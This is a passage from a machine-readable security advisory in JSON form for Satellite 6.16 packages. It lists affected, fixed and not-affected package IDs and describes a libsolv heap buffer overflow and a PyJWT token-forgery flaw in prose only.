"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
},
{
"acknowledgments": [
{
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-48864",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-04-21T23:19:41+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460425"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libsolv. This heap buffer overflow occurs during the decompression of attacker-controlled compressed data within `.solv` files due to insufficient input validation. An attacker can provide a specially crafted `.solv` file, which, when processed by a vulnerable application, can lead to out-of-bounds memory access. This could result in information disclosure, alteration of program execution, or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libsolv: Heap buffer overflow in libsolv repopagestore via unchecked decompression of malicious .solv page data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This heap buffer overflow in libsolv\u0027s page decompression logic can lead to out-of-bounds reads and writes when processing specially crafted `.solv` files. Exploitation requires a victim application to ingest malicious repository metadata, limiting the attack vector to scenarios involving user interaction or untrusted content sources. Given the user interaction needed, Red Hat Product Security has rated this vulnerability as having a impact of Moderate.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
